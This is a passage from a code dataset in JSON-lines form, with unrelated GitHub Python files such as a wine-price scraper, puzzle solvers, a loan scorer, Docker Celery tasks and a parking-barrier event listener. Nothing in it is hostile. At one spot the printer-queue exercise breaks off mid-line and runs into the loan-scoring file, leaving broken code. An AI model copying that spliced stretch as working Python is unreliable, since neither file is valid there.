구명보트/구명보트.py","file_name":"구명보트.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33564500068","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport os, sys\nimport cookielib\nfrom cookielib import Cookie\nimport urllib, urllib2\nfrom bs4 import BeautifulSoup\nimport re\nimport json\nimport string\nfrom datetime import date\nimport time\n\ndef dec_json(chemin):\n with open(chemin, 'r') as fichier:\n return json.loads(fichier.read())\n\ndef enc_json(database, chemin):\n with open(chemin, 'w') as fichier:\n json.dump(database, fichier)\n\ndef makeCookie(name, value):\n return Cookie(\n version=0,\n name=name,\n value=value,\n port=None,\n port_specified=False,\n domain=\"\",\n domain_specified=False,\n domain_initial_dot=False,\n path=\"/\",\n path_specified=True,\n secure=False,\n expires=None,\n discard=False,\n comment=None,\n comment_url=None,\n rest=None\n )\n\ndef extract_bs_text(bs_bloc):\n if bs_bloc:\n return bs_bloc.text\n else:\n return None\n\n# Build urllib2 opener\ncookie_jar = cookielib.LWPCookieJar()\nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))\nopener.addheaders = [('User-agent',\n 'Mozilla/5.0 (Windows NT 6.1; WOW64) '+\\\n 'AppleWebKit/537.11 (KHTML, like Gecko) '+\\\n 'Chrome/23.0.1271.64 Safari/537.11')]\nurllib2.install_opener(opener)\n\ndict_bottle_rows = {}\n\n# Visit website\nwebsite_url = u'http://vins-champagnes.carrefour.fr/'\nresponse = urllib2.urlopen(website_url)\ndata = response.read()\nsoup = BeautifulSoup(data)\n# header_nav = soup.find('ul', {'id' : 'header_new_nav'})\n\n# Seems enough to loop on this page (for France at least)\n\ndict_info = {}\ndict_prices = {}\n\nfor i in range(1, 37):\n ref_page_url = u'http://vins-champagnes.carrefour.fr/' +\\\n u'catalogue-region.php?id=87&langue=fr&monnaie=eur&pays=fr' +\\\n u'&pageID={:d}#accestop'.format(i)\n response = urllib2.urlopen(ref_page_url)\n data = response.read()\n soup = BeautifulSoup(data)\n \n # Need to collect and reconcile two blocks for each bottle\n # Both contain url of fiche-produit => stored in two dicts to avoid mistakes\n ls_bloc_prod_info = soup.findAll('div', {'class' : 'box_listing_1col'})\n ls_bloc_prod_price = soup.findAll('div', {'class' : 'box_listing_choix_conditionnement'})\n \n # Extract info for each product\n \n ls_info_txt_fields = ['box_listing_nom_produit',\n 'box_fiche_produit_type_vin_txt',\n 'box_listing_descriptif',\n 'box_fiche_produit_type_vin_txt']\n \n for bloc_prod_info in ls_bloc_prod_info:\n \n bloc_name = bloc_prod_info.find('div', {'class' : 'box_listing_nom_produit'})\n href = None\n if bloc_name and bloc_name.a:\n href = bloc_name.a['href']\n \n # List of txt fields\n ls_prod_info = []\n for info_txt_field in ls_info_txt_fields:\n bloc_info_temp = bloc_prod_info.find('div', {'class' : info_txt_field})\n ls_prod_info.append([info_txt_field, extract_bs_text(bloc_info_temp)])\n \n # list (to be processed later)\n bloc_situation = bloc_prod_info.find('ul', {'class' : 'box_listing_situation'})\n ls_situation = []\n if bloc_situation:\n ls_situation = [extract_bs_text(field) for field in bloc_situation.findAll('li')]\n ls_prod_info.append(['situation', ls_situation])\n \n # span... 
not sure, text might be enough\n bloc_info_cl = bloc_prod_info.find('span', {'class' : 'box_listing_cl'})\n info_cl = extract_bs_text(bloc_info_cl)\n ls_prod_info.append(['info_cl', info_cl])\n \n dict_info[href] = ls_prod_info\n \n # Extract prices for each product\n \n ls_price_txt_fields = ['box_conditionnement_lot',\n 'box_conditionnement_prix']\n \n for bloc_prod_price in ls_bloc_prod_price:\n \n href = None\n bloc_btn_panier = bloc_prod_price.find('a', {'class' : 'btn_panier_etape_rouge_conteneur',\n 'href' : True})\n if bloc_btn_panier: \n href = bloc_btn_panier['href']\n \n ls_prod_prices = []\n ls_price_blocs = bloc_prod_price.findAll('div', {'class' : 'box_conditionnement'})\n for price_bloc in ls_price_blocs:\n ls_prices = [[price_txt_field,\n extract_bs_text(price_bloc.find('div', {'class' : price_txt_field}))]\\\n for price_txt_field in ls_price_txt_fields]\n # span prix unitaire\n price_field = 'box_conditionnement_prix_unitaire'\n bloc_pu = price_bloc.find('div', {'class' : price_field})\n price_pu = [price_field, None]\n if bloc_pu:\n price_pu = [price_field, ' '.join(bloc_pu.findAll(text = True))]\n ls_prices.append(price_pu) \n ls_prod_prices.append(ls_prices)\n \n dict_prices[href] = ls_prod_prices\n\npath_current_dir = os.path.abspath(os.path.dirname(sys.argv[0]))\nenc_json(dict_prices,\n os.path.join(path_current_dir, u'dict_carrefour_prelim_prices.json'))\nenc_json(dict_info,\n os.path.join(path_current_dir, u'dict_carrefour_prelim_info.json'))\n","repo_name":"etiennecha/master_code","sub_path":"code_tests/code_wine_scraping/scraping_vins_carrefour_prelim.py","file_name":"scraping_vins_carrefour_prelim.py","file_ext":"py","file_size_in_byte":5007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"9920965650","text":"# a program to check if a complete Sudoku grid is valid or not\r\n# Budeli Rendani\r\n# BDLREN001\r\n# 14/05/2014\r\n\r\ndef main():\r\n# initial values\r\n horizontal = True\r\n vertical = True\r\n gridler = True\r\n sudoku = [] \r\n\r\n # populating sudoku grid\r\n length=9\r\n for i in range(length):\r\n row = input(\"\")\r\n sudoku.append(row)\r\n\r\n # grid test\r\n length=9\r\n gchecklist = []\r\n for i in range(length):\r\n line = sudoku[i]\r\n # converts the entire sudoku grid into a linear array\r\n for i in range(length):\r\n gchecklist.append(line[i:i+1])\r\n\r\n # vertical test\r\n length=9 \r\n for x in range(length):\r\n vchecklist = []\r\n for i in range(length):\r\n line = sudoku[i]\r\n vchecklist.append(line[x:x+1])\r\n for i in range(length):\r\n if vchecklist.count(vchecklist[i]) > 1:\r\n vertical = False\r\n \r\n # horizontal check\r\n length=9\r\n for i in range(length):\r\n line = sudoku[i]\r\n hchecklist = []\r\n # converting the sudoku row into a string\r\n for i in range(length):\r\n hchecklist.append(line[i:i+1])\r\n for i in range(length):\r\n if hchecklist.count(hchecklist[i]) > 1:\r\n horizontal = False\r\n\r\n counter = 0\r\n # constructs grids from the linear array of the sudoku grid and checks them\r\n for i in range(len(gchecklist)-27):\r\n grid = \"\"\r\n if i%9 ==0:\r\n counter += 1\r\n if counter%4 == 0 or counter == 1:\r\n if i%3 == 0:\r\n for l in range(3):\r\n grid += gchecklist[i + l]\r\n for l in range(3):\r\n grid += gchecklist[i + 9 + l] \r\n for l in range(3):\r\n grid += gchecklist[i + 18 + l]\r\n num = 0\r\n for k in range(9):\r\n num += int(grid[k:k+1])\r\n if num != 45:\r\n gridler = False\r\n grid = \"\" \r\n if horizontal == True and vertical == 
True and gridler == True:\r\n print(\"Sudoku grid is valid\")\r\n else: \r\n print(\"Sudoku grid is not valid\")\r\nmain()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_9/bdlren001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4610082661","text":"# -*- coding: utf-8 -*-\n\"\"\"\n****************************************************\n* privateGPT-container \n* (c) 2023 Alexander Hering *\n****************************************************\n\"\"\"\nimport os\nimport json\n\n\nmodel = os.environ.get(\"MODEL_TO_USE\", \"eachadea_ggml-vicuna-7b-1.1/ggml-vicuna-7b-1.1-q4_2.bin\")\nshared_model_folder = \"/privateGPT-container/machine_learning_models/MODELS\"\nlocal_model_target = \"/privateGPT-container/privateGPT/models\"\nenv_path = \"/privateGPT-container/privateGPT/.env\"\n\n\nif not os.path.exists(local_model_target):\n os.system(f\"ln -sf {shared_model_folder} {local_model_target}\")\n\n\ndata_path = os.path.join(shared_model_folder, \"data.json\")\nif os.path.exists(data_path):\n model_data = json.load(open(data_path, 'r', encoding='utf-8'))[model]\nelse:\n model_data = {\"type\": \"LlamaCpp\"}\n\nenv_file_content = f\"\"\"PERSIST_DIRECTORY=db\nMODEL_TYPE={model_data['type']}\nMODEL_PATH=models/{model}\nEMBEDDINGS_MODEL_NAME=all-MiniLM-L6-v2\nMODEL_N_CTX=1000\n\"\"\"\n\nif os.path.exists(env_path):\n os.remove(env_path)\nopen(env_path, \"w\", encoding='utf-8').write(env_file_content)\n\n","repo_name":"AlHering/privateGPT-container","sub_path":"set_model.py","file_name":"set_model.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16096067839","text":"class Solution:\n '''\n n 皇后问题研究的是如何将 n 个皇后放置在 n×n 的棋盘上,并且使皇后彼此之间不能相互攻击。\n '''\n def solveNQueens(self, n: int) -> List[List[str]]:\n res = []\n s = \".\" * n\n def backtrack(i, tmp,col,z_diagonal,f_diagonal):\n if i == n:\n res.append(tmp)\n return \n for j in range(n):\n if j not in col and i + j not in z_diagonal and i - j not in f_diagonal:\n backtrack(i+1,tmp + [s[:j] + \"Q\" + s[j+1:]], col | {j}, z_diagonal |{i + j} , f_diagonal |{i - j} ) \n \n backtrack(0,[],set(),set(),set()) \n return res\n","repo_name":"algorithm004-02/algorithm004-02","sub_path":"Week 02/id_282/LeetCode_51_282.py","file_name":"LeetCode_51_282.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"40"} +{"seq_id":"41528253137","text":"\"\"\"\n1966 - 프린터 큐\n간단했다. 
주어진 대로 구현하면 됐다.\n\"\"\"\nt = int(input())\nfor _ in range(t):\n N , M = map(int,input().split())\n data = list(map(int,input().split()))\n q = []\n # 큐에 우선순위와 인덱스를 튜플형태로 넣는다.\n for i in range(N):\n q.append((data[i],i))\n # 삭제했는지 체크 삭제 하지마 않았다면 flag = 0이며 우선순위가 높다는 뜻이다.\n flag = 0\n # 우선순위에 따라 배열에 저장\n ret = []\n # 몇번째에 출력됐는지 확인\n time = 0\n # 종료 조건은 최대 N개 만큼 출력 될 수 있으므로 \n while time = 222:\n return json.dumps({\"verdict\":\"Accept with Caution\", \"interest\": 15})\n else:\n return json.dumps({\"verdict\": \"Reject\", \"interest\": None})\n else:\n # check the score against threshold\n print(\"Reject\")\n\n#batch processing option\n# import json files\n#data = json.load(open(\"data.json\"))\n\n# def main():\n# try:\n# df = pd.read_json(\"csvjson.json\")\n# accept_reject(df)\n# except:\n# \"Perhaps you did not import a json file\"\n\n# if __name__ == \"__main__\":\n# main()\n\ndf = pd.read_csv(\"my_csv.csv\")\n#accept_reject(df)\n#print(df.iloc[[0]])\n#df = pd.read_json(\"csvjson.json\")\nprint(accept_reject(df.iloc[[0]]))\n\n# Batch processing\n\"\"\"def batch_processing(csv_file, number_of_chunks=1):\n all_batches = []\n chunk_iter = pd.read_csv(csv_file, chunksize=number_of_chunks)\n for chunk in chunk_iter:\n all_batches.append(accept_reject(chunk))\n df_all_batches = pd.concat(all_batches)\n return df_all_batches\n\nbatch_processing(\"my_csv.csv\", 1)\"\"\"\n ","repo_name":"oagbaneje/psychic-adventure","sub_path":"scorer.py","file_name":"scorer.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31509001195","text":"# simple clock program in micropython for tm1637\n# Tommy Faasen 2018\n\nimport time\nimport tm1637\n\n#pin 4 is clk (D2)\n#pin 5 is data (D1)\n#brightness is set to 2 (0-7)\ndisplay=tm1637.TM1637(4,5,2)\n#clear screen\ndisplay.Clear()\n\nwhile True:\n #get the time\n lt=time.localtime()\n #lt[3] = hour\n #lt[4] = minutes\n mytime=\"%d%d\"%(lt[3],lt[4])\n #check if hour or minutes is 1 or 2 digits\n if lt[3]<10:\n if(lt[4])<10:\n mytime=\" %d0%d\"%(lt[3],lt[4])\n else:\n mytime=\" %d%d\"%(lt[3],lt[4])\n else:\n if(lt[4])<10:\n mytime=\"%d0%d\"%(lt[3],lt[4])\n \n #set display with list of 4 digits 0=0, 1=1, 10=A, 15=F\n display.Show([int(mytime[0]),int(mytime[1]),int(mytime[2]),int(mytime[3])]) \n # show colon every other second\n display.ShowDoublepoint(lt[5]%2) \n print(\"%d:%d:%d\"%(lt[3],lt[4],lt[5]))\n time.sleep(1)\n","repo_name":"it0it0/tm1637","sub_path":"tmclock.py","file_name":"tmclock.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23773341378","text":"#Just a simple file to test out the powers of the motors\nfrom math import *\n\ndef motor_strength(Vlinear, direction, Vangular, wheel):\n wheels = [0, 120, 240] #Placement of each wheel\n wheelAngle = wheels[wheel] #The angle of the target wheel\n Vrx = Vlinear * cos(direction) #The X movement of the robot\n Vry = Vlinear * sin(direction) #The Y movement of the robot\n Vwx = Vrx * cos(wheelAngle) #The X movement of the wheel\n Vwy = Vry * - sin(wheelAngle) #The Y movement of the wheel\n Vw = Vlinear * (cos(direction) * cos(wheelAngle) - sin(direction) * sin(wheelAngle)) + Vangular #The combined strength for the wheel\n return Vw \n\ntest_data = [[1.0, 0.0, 0.0], [1000.0, 0.0, 0.0], [5.0, 0.0, 0.0], [5.0, 180.0, 0.0], [5.0, 90.0, 0.0], [5.0, 270.0, 90.0]]\n\nfor test in test_data:\n 
print(\"\\n\\n\\n-------------------------------\")\n print(\"Linear speed : \"+str(test[0]))\n print(\"Direction : \"+str(test[1]))\n print(\"Angular speed : \"+str(test[2]))\n print(\"Motor 1 power : \"+str(motor_strength(test[0], test[1], test[2], 0)))\n print(\"Motor 2 power : \"+str(motor_strength(test[0], test[1], test[2], 1)))\n print(\"Motor 3 power : \"+str(motor_strength(test[0], test[1], test[2], 2)))\n","repo_name":"Isaac-bankier/robot","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25326482823","text":"from __future__ import absolute_import\n\nimport celery\nimport docker\nimport time\n\n\n# DOCKER\n@celery.task()\ndef create(portal):\n client = docker.Client(base_url=portal.base_url)\n try:\n portal_name = portal.name.replace(' ', '_').lower()\n container = client.create_container(\n name=portal_name,\n image=portal.operational_system.image_name,\n ports=[portal.initial_port],\n stdin_open=True,\n tty=True,\n command=portal.initial_command,\n host_config=client.create_host_config(\n port_bindings={portal.initial_port: int(portal.initial_port) + 1}))\n\n portal.external_id = container.get('Id')\n portal.state = 'done'\n portal.message_error = ''\n client.start(container=container.get('Id'))\n log_message = 'SUCCESS! Site {} created.'.format(portal_name)\n except Exception as exc:\n portal.message_error = exc\n portal.state = 'error'\n log_message = 'ERROR! {}'.format(exc)\n portal.save()\n return log_message\n\n\n@celery.task()\ndef stop(portal):\n client = docker.Client(base_url=portal.base_url)\n try:\n client.stop(portal.external_id)\n portal.state = 'stopped'\n portal.save()\n log_message = 'SUCCESS! Site {} stopped.'.format(portal.name)\n except Exception as exc:\n log_message = 'ERROR! Site {} not stopped. EXCEPTION: {}'.format(portal.name, exc)\n return log_message\n\n\n@celery.task()\ndef restart(portal):\n client = docker.Client(base_url=portal.base_url)\n try:\n client.restart(portal.external_id)\n portal.state = 'done'\n portal.save()\n log_message = 'SUCCESS! Site {} restarted.'.format(portal.name)\n except Exception as exc:\n log_message = 'ERROR! Site {} not restarted. EXCEPTION: {}'.format(portal.name, exc)\n return log_message\n\n\n@celery.task()\ndef destroy(portal):\n client = docker.Client(base_url=portal.base_url)\n try:\n client.stop(portal.external_id)\n client.remove_container(portal.external_id or portal.name.replace(' ', '_').lower(), force=True)\n portal.state = 'destroyed'\n portal.save()\n log_message = 'SUCCESS! Site {} destroyed.'.format(portal.external_id)\n except Exception as exc:\n log_message = 'ERROR! Site {} not destroyed. 
EXCEPTION: {}'.format(portal.name, exc)\n return log_message\n","repo_name":"monjebour/portal-creator","sub_path":"portal/tasks/docker.py","file_name":"docker.py","file_ext":"py","file_size_in_byte":2411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"29504181849","text":"import math\ndef LeftRotationOneTime(arr):\n\n if len(arr)>1:\n temp = arr[0]\n for i in range(1,len(arr)):\n arr[i-1] = arr[i]\n\n arr[i] = temp\n \ndef leftRotatebyd(arr, d): \n for i in range(d): \n LeftRotationOneTime(arr) \n return arr\n####### More efficient algorithm ########### \n\ndef rotateLeft(arr,d):\n\n n = len(arr)\n Gcd = math.gcd(n,d)\n for i in range(Gcd):\n\n temp = arr[i]\n j = i\n while 1:\n k = j + d\n if k>=n:\n k = k-n\n if k==i:\n break\n arr[j] = arr[k]\n j = k\n arr[j] = temp\n\n return arr\n\narray = list(map(int,input(\"Enter your array (as space separated integers) : \").split()))\nd = int(input(\"How many times you want to rotate? \"))\n\na = leftRotatebyd(array,d)\nprint(a)\n","repo_name":"LunaticPrakash/Data-Structure-And-Algorithms","sub_path":"Python/Array/Array-Left-Rotation-By-d.py","file_name":"Array-Left-Rotation-By-d.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"}
+{"seq_id":"13276641180","text":"\nfrom bs4 import BeautifulSoup\nfrom dateutil import parser as dp\nimport asyncio\nfrom datetime import datetime\nimport json\nimport base64\nimport functools\nimport uuid\nimport signal\nimport os\nimport sys\nfrom utils.asyncsql import AsyncDBPool\nfrom utils.asynclog import AsyncLogger\nfrom utils.asyncamqp import AsyncAMQP, ChannelClosed, ChannelInvalidStateError\nfrom utils.asyncsoap import AsyncSOAP\nimport configuration.settings as cs\nfrom datetime import timedelta\nfrom uuid import uuid4\nimport aiohttp\nimport base64\nfrom setproctitle import setproctitle\nimport uvloop\n\n\nclass ExitListener:\n def __init__(self):\n self.__dbconnector_ws: object = None\n self.__dbconnector_is: object = None\n self.__soapconnector_wp: object = None\n self.__amqpconnector: object = None\n self.__logger: object = None\n self.__eventloop: object = None\n self.__eventsignal: bool = False\n self.name = 'ExitListener'\n\n @property\n def eventloop(self):\n return self.__eventloop\n\n @eventloop.setter\n def eventloop(self, value):\n self.__eventloop = value\n\n @eventloop.getter\n def eventloop(self):\n return self.__eventloop\n\n @property\n def eventsignal(self):\n return self.__eventsignal\n\n @eventsignal.setter\n def eventsignal(self, v):\n self.__eventsignal = v\n\n @eventsignal.getter\n def eventsignal(self):\n return self.__eventsignal\n\n async def _initialize(self) -> None:\n setproctitle('is-exits')\n self.__logger = await AsyncLogger().getlogger(cs.IS_LOG)\n await self.__logger.info({'module': self.name, 'info': 'Starting...'})\n try:\n connections_tasks = []\n connections_tasks.append(AsyncDBPool(cs.IS_SQL_CNX).connect())\n connections_tasks.append(AsyncDBPool(cs.WS_SQL_CNX).connect())\n connections_tasks.append(AsyncSOAP(cs.WS_SOAP_USER, cs.WS_SOAP_PASSWORD, cs.WS_SERVER_ID, cs.WS_SOAP_TIMEOUT, cs.WS_SOAP_URL).connect())\n connections_tasks.append(AsyncAMQP(cs.IS_AMQP_USER, cs.IS_AMQP_PASSWORD, cs.IS_AMQP_HOST, exchange_name='integration', exchange_type='topic').connect())\n self.__dbconnector_is, self.__dbconnector_ws, self.__soapconnector_wp, self.__amqpconnector = await asyncio.gather(*connections_tasks)\n await 
self.__amqpconnector.bind('exit_signals', ['status.*.exit', 'command.challenged.out'], durable=True)\n await self.__dbconnector_is.callproc('is_processes_ins', rows=0, values=[self.name, 1, os.getpid(), datetime.now()])\n await self.__logger.info({'module': self.name, 'info': 'Started'})\n return self\n except Exception as e:\n await self.__logger.exception({'module': self.name})\n raise e\n\n async def _get_photo(self, ip) -> object:\n # try-except. If IP is valid and timeout wasn't exceeded an object will be returned\n conn = aiohttp.TCPConnector(force_close=True, ssl=False, enable_cleanup_closed=True, ttl_dns_cache=3600)\n async with aiohttp.ClientSession(connector=conn) as session:\n try:\n async with session.get(url=f'http://{ip}/axis-cgi/jpg/image.cgi?camera=1&resolution=1024x768&compression=25', timeout=2, raise_for_status=True) as response:\n result_raw = await response.content.read()\n result = base64.b64encode(result_raw)\n return result\n except:\n return None\n\n async def _get_plate_image(self, ip):\n # try-except. If IP is valid and timeout wasn't exceeded an object will be returned\n conn = aiohttp.TCPConnector(force_close=True, ssl=False, enable_cleanup_closed=True, ttl_dns_cache=3600)\n async with aiohttp.ClientSession(conn) as session:\n try:\n async with session.get(url=f'http://{ip}/module.php?m=sekuplate&p=getImage&img=/home/root/tmp/last_read.jpg', timeout=2, raise_for_status=True) as response:\n result_raw = await response.content.read()\n result = base64.b64encode(result_raw)\n return result\n except:\n return None\n\n async def _get_plate_data(self, ip, ts):\n # try-except. If IP is valid and timeout wasn't exceeded an object will be returned\n conn = aiohttp.TCPConnector(force_close=True, ssl=False, enable_cleanup_closed=True, ttl_dns_cache=3600)\n async with aiohttp.ClientSession(connector=conn) as session:\n try:\n async with session.get(url=f'http://{ip}/module.php?m=sekuplate&p=letture', timeout=2, raise_for_status=True) as response:\n data = await response.content.read()\n soup = BeautifulSoup(data, 'html.parser')\n table_dict = {}\n for row in soup.findAll('tr'):\n aux = row.findAll('td')\n table_dict[aux[0].string] = aux[1].string\n result = {}\n result.update({'confidence': float(table_dict['OCR SCORE'])*100})\n result.update({'plate': table_dict['PLATE']})\n result.update({'date': dp.parse(f\"{table_dict['DATE']} {table_dict['HOUR'][0:2]}:{table_dict['HOUR'][3:5]}:{table_dict['HOUR'][6:8]}\")})\n if ts - result['date'].timestamp() <= 10:\n return result\n else:\n return {'confidence': 0, 'plate': None, 'date': datetime.now()}\n except:\n return {'confidence': 0, 'plate': None, 'date': datetime.now()}\n\n async def _process_loop1_event(self, data, device):\n try:\n if data['value'] == 'OCCUPIED':\n photo1left = await self._get_photo(device['camPhoto1'])\n tasks = []\n tasks.append(self.__dbconnector_is.callproc('is_exit_loop1_ins', rows=0, values=[data['tra_uid'], data['act_uid'], data['device_id'], datetime.fromtimestamp(data['ts'])]))\n tasks.append(self.__dbconnector_is.callproc('is_photo_ins', rows=0, values=[data['tra_uid'], data['act_uid'], photo1left, data['device_id'], device['camPhoto1'], datetime.now()]))\n tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.loop1.occupied'], priority=10))\n await asyncio.gather(*tasks)\n elif data['value'] == 'FREE':\n await asyncio.sleep(0.2)\n temp_data = await self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0])\n if not temp_data is None:\n 
data['tra_uid'] = temp_data['transactionUID']\n await self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.loop2.free'], priority=10)\n except Exception as e:\n await self.__logger.error({'module': self.name, 'method': 'loop1_event', 'error': repr(e)})\n\n async def _process_barrier_event(self, data, device):\n if data['value'] == 'OPENED':\n pre_tasks = []\n pre_tasks.append(self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0]))\n pre_tasks.append(self.__dbconnector_ws.callproc('wp_exit_get', rows=1, values=[data['device_id'], int(data['ts'])]))\n pre_tasks.append(self._get_photo(device['camPhoto1']))\n pre_tasks.append(self._get_plate_data(device['camPlate'], data['ts']))\n pre_tasks.append(self._get_plate_image(device['camPlate']))\n temp_data, transit_data, photo2left, plate_data, plate_image = await asyncio.gather(*pre_tasks)\n if temp_data['transitionType'] != 'CHALLENGED':\n post_tasks = []\n post_tasks.append(self.__dbconnector_is.callproc('is_exit_barrier_ins', rows=0, values=[data['device_id'], data['act_uid'], transit_data.get('transitionType', None),\n json.dumps(transit_data, default=str), datetime.fromtimestamp(data['ts'])]))\n post_tasks.append(self.__dbconnector_is.callproc('is_photo_ins', rows=0, values=[temp_data['transactionUID'],\n data['act_uid'], photo2left, data['device_id'], device['camPhoto1'], datetime.fromtimestamp(data['ts'])]))\n post_tasks.append(self.__dbconnector_is.callproc('is_plate_ins', rows=0, values=[temp_data['transactionUID'], data['act_uid'], data['device_id'], plate_image,\n plate_data['confidence'], plate_data['plate'], plate_data['date']]))\n data['tra_uid'] = temp_data['transactionUID']\n post_tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.barrier.opened'], priority=10))\n await asyncio.gather(*post_tasks)\n elif data['value'] == 'CLOSED':\n await asyncio.sleep(0.2)\n temp_data = await self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0])\n if not temp_data is None:\n data['tra_uid'] = temp_data['transactionUID']\n await self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.barrier.closed'], priority=10)\n # simulate as normal barrier event\n\n async def _process_command_event(self, data, device):\n pre_tasks = []\n pre_tasks.append(self.__dbconnector_is.callproc('is_exit_get', rows=1, values=['device_id']))\n pre_tasks.append(self._get_photo(device['camPhoto1']))\n pre_tasks.append(self._get_plate_data(device['camPlate'], data['ts']))\n pre_tasks.append(self._get_plate_image(device['camPlate']))\n temp_data, photo2left, plate_data, plate_image = await asyncio.gather(*pre_tasks)\n transit_data = {'transitionId': 0, 'transitionTS': datetime.now(), 'transitionArea': device['areaId'],\n 'transitionPlate': plate_data['plate'], 'transionStatus': 1, 'transitionTariff': -1,\n 'transitionTicket': '', 'subscriptionTicket': '', 'transitionType': 'CHALLENGED', 'transitionFine': 0}\n post_tasks = []\n post_tasks.append(self.__dbconnector_is.callproc('is_exit_command_ins', rows=0, values=[data['device_id'],\n data['act_uid'], json.dumps(transit_data, default=str), datetime.fromtimestamp(data['ts'])]))\n post_tasks.append(self.__dbconnector_is.callproc('is_photo_ins', rows=0, values=[temp_data['transactionUID'],\n data['act_uid'], photo2left, data['device_id'], device['camPhoto1'], datetime.fromtimestamp(data['ts'])]))\n post_tasks.append(self.__dbconnector_is.callproc('is_plate_ins', rows=0, 
values=[temp_data['transactionUID'], data['act_uid'], data['device_id'], plate_image,\n plate_data['confidence'], plate_data['plate'], plate_data['date']]))\n if temp_data is not None:\n data['tra_uid'] = temp_data['transactionUID']\n post_tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.barrier.opened'], priority=10))\n await asyncio.gather(*post_tasks)\n\n async def _process_loop2_event(self, data, device):\n if data['value'] == 'OCCUPIED':\n pre_tasks = []\n pre_tasks.append(self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0]))\n pre_tasks.append(self._get_photo(device['camPhoto2']))\n temp_data, photo3right = await asyncio.gather(*pre_tasks)\n post_tasks = []\n post_tasks.append(self.__dbconnector_is.callproc('is_exit_loop2_ins', rows=0, values=[data['device_id'], data['act_uid'], data['ts']]))\n # the loop2 photo comes from camPhoto2, so store it against that camera\n post_tasks.append(self.__dbconnector_is.callproc('is_photo_ins', rows=0, values=[temp_data['transactionUID'],\n data['act_uid'], photo3right, data['device_id'], device['camPhoto2'], datetime.fromtimestamp(data['ts'])]))\n if temp_data is not None:\n data['tra_uid'] = temp_data['transactionUID']\n post_tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.loop2.occupied'], priority=10))\n await asyncio.gather(*post_tasks)\n elif data['value'] == 'FREE':\n tasks = []\n # expect that loop2 was passed and session was closed\n temp_data = await self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0])\n if temp_data is not None:\n data['tra_uid'] = temp_data['transactionUID']\n if temp_data['transitionType'] != 'CHALLENGED':\n tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.loop2.free'], priority=10))\n elif temp_data['transitionType'] == 'CHALLENGED':\n tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.challenged.out'], priority=10))\n tasks.append(self.__dbconnector_is.callproc('is_exit_confirm_upd', rows=0, values=[data['device_id'], datetime.fromtimestamp(data['ts'])]))\n await asyncio.sleep(0.2)\n await asyncio.gather(*tasks)\n\n async def _process_reverse_event(self, data, device):\n pre_tasks = []\n pre_tasks.append(self.__dbconnector_ws.callproc('wp_exit_get', rows=1, values=[data['device_id'], int(data['ts'])]))\n pre_tasks.append(self.__dbconnector_is.callproc('is_exit_get', rows=1, values=[data['device_id'], 0]))\n await asyncio.sleep(0.2)\n transit_data, temp_data = await asyncio.gather(*pre_tasks, return_exceptions=True)\n post_tasks = []\n if temp_data is not None:\n data['tra_uid'] = temp_data['transactionUID']\n post_tasks.append(self.__amqpconnector.send(data=data, persistent=True, keys=['event.exit.loop1.reverse'], priority=10))\n post_tasks.append(self.__dbconnector_is.callproc('is_exit_reverse_ins', rows=0, values=[data['device_id'], data['act_uid'],\n json.dumps(transit_data, default=str), datetime.fromtimestamp(data['ts'])]))\n await asyncio.gather(*post_tasks)\n\n async def _process(self, redelivered, key, data):\n try:\n # check message keys\n device = await self.__dbconnector_is.callproc('is_column_get', rows=1, values=[data['device_id']])\n if key == 'status.loop1.exit':\n await self._process_loop1_event(data, device)\n elif key == 'status.loop2.exit':\n await self._process_loop2_event(data, device)\n elif key == 'status.barrier.exit':\n await self._process_barrier_event(data, device)\n elif key == 'command.challenged.out':\n await self._process_command_event(data, device)\n elif key 
